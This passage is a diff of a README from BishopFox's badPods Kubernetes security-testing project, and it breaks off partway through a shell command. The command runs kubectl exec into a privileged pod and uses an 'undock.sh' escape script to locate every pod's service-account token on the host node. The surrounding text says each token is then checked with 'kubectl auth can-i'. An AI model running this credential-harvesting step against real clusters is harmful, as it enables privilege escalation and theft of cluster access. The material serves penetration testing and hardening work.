BishopFox/badPods/manifests/priv/README.md

 **Run kubectl can-i --list against ALL tokens found on the node**

-Run this where you have kubectl installed, and NOT from within the priv pod.
+*Run this where you have kubectl installed, and NOT from within the priv pod.*

-This is what the following command does:
-* From outside the pod, you execute `kubectl exec`, and use undock.sh to find all of the token locations on the host
-* You then iterate through the list of filenames, and
-  * Print the token location
-  * Run `kubectl auth can-i list` using each token via the `--token` command line argument.

 ```
 tokens=`kubectl exec -it priv-exec-pod -- sh undock.sh """find /var/lib/kubelet/pods/ -name token -type l"""`; \
 for filename in $tokens; \